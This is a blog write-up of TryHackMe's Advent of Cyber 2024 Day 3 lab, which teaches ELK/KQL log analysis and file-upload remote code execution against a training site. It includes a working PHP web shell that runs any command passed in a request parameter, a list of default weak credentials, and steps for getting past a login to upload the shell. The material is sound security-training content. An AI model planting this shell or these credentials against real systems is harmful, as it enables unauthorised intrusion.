Happy December 3rd, another new day means another new challenge in the Advent of Cyber 2024 event by TryHackMe. If you’re not caught up yet or you want to know more about the event, check out my Day 1 article. No answers will posted in these articles as per the rules of Advent of Cyber but I explain my process of finding them without actually showing the answer. Again, to go along with the holiday season and this event of daily challenges, I’m going to try my best to complete the new challenge each day, and some days I might post writeup here. This won’t be a daily thing as each days challenge is pretty long, and I am fastly approaching finals week but I’ll post here when possible.
Day 3: Even if I wanted to go, their vulnerabilities wouldn't allow it.
The learning objectives for todays challenge include:
Learn about Log analysis and tools like ELK
Learn about KQL (Kibana Query Language), and how to use it when using ELK
Learn about RCE (Remote Code Execution), and how this can be done via unsafe/unrestricted file uploads
In todays challenge we’re continuing on the theme of log analysis from yesterday and continuing to use Elastic. Today they are really explaining each section of the application and the purposes. Todays challenge does a mix of red and blue aspects along with the practical and question sections of the challenge. Following or reading along with the task on TryHackMe is very useful, especially if you were wanting a bit more of an explanation to yesterdays challenge.
Operation Blue
It goes through the explanation of ELK, showing how to change the collection of logs, the timeframe, and explaining each section of the discover page like the search bar, index pattern, fields, timeline, documents (logs), and the time filter; as well where they are on the site. It also explains KQL, how it’s used, and the query and syntax, which is also show and discussed below in the table.
| Query/Syntax | Description | Example |
| “ “ | search specific values, used for exact searches | “TryHackMe” |
| * | denotes a wildcard, searches similar matches to the value provided | United * (would return United Kingdom and United States) |
| OR | search logs containing either of the values provided | “United Kingdom” OR “England” |
| AND | search logs containing both of the values provided | “Ben” AND “25” |
| : | used to search the specified field of a document | ip.address:10.10.10.10 |
Operation Red
This section focuses on the attack and exploiting file upload vulnerabilities. It explains the dangers of unrestricted file uploads and the usage of weak credentials. Some common examples are shown in the table below.
| Username | Password |
| admin | admin |
| administrator | administrator |
| admin@domainname | admin |
| guest | guest |
It walks through RCEs, web shells, and how to exploit an RCE through file upload. It also provides some code and other examples. The code here is an example of PHP file that could be used to exploit this vulnerability, provided by THM.
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['command']))
{
system($_GET['command'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
Before moving onto the questions, make sure you have proper access to frostypines.thm, to make sure you do, you can either use root and enter the command, echo "[MACHINE IP] frostypines.thm" >> /etc/hosts, in your terminal (remember to enter the machines IP). Or you could find the file and write to it directly.
Questions
BLUE Question 1: Where was the web shell uploaded to? Answer format: /directory/directory/directory/filename.php
Using the search bar and searching “shell.php” using KQL, and enabling the message field to view in the details of the logs revealed some paths to focus my attention on for this question. There are a few different ones so make sure they fit the answer format, and use the hint for some extra help if you need.
BLUE Question 2: What IP address accessed the web shell?
Looking at the IP addresses linked with the logs that were were shown using the above search filter revealed the answer, there a couple different IPs shown but it will be quite obvious which one is it.
RED Question 3: What is the contents of flag.txt?
Using other things mentioned in this room earlier such as weak credentials, RCE, and common shell.php code will help you find the required file. Bypassing the login page for the frostypines site will let you gain access to a file upload, use that to upload your shell code. Once you have done that, navigate to the directory you found earlier. If you did the previous steps successfully, when you navigate to that directory you should see the following screen. Enter the necessary commands to find the flag.
Question 4: If you liked today's task, you can learn how to harness the power of advanced ELK queries.
Conclusion
The continuation of log analysis from yesterday, along with the new inclusion of some red tasks and a website to explore was great. There was a lot of explanation prior to the questions but the questions themselves included very little detail, which worked well for putting newly learnt info and skills to the test. A bit more challenging compared to yesterday but still pretty easy for beginners or less advanced users to pickup on and a lot of fun. Looking forward to tomorrow!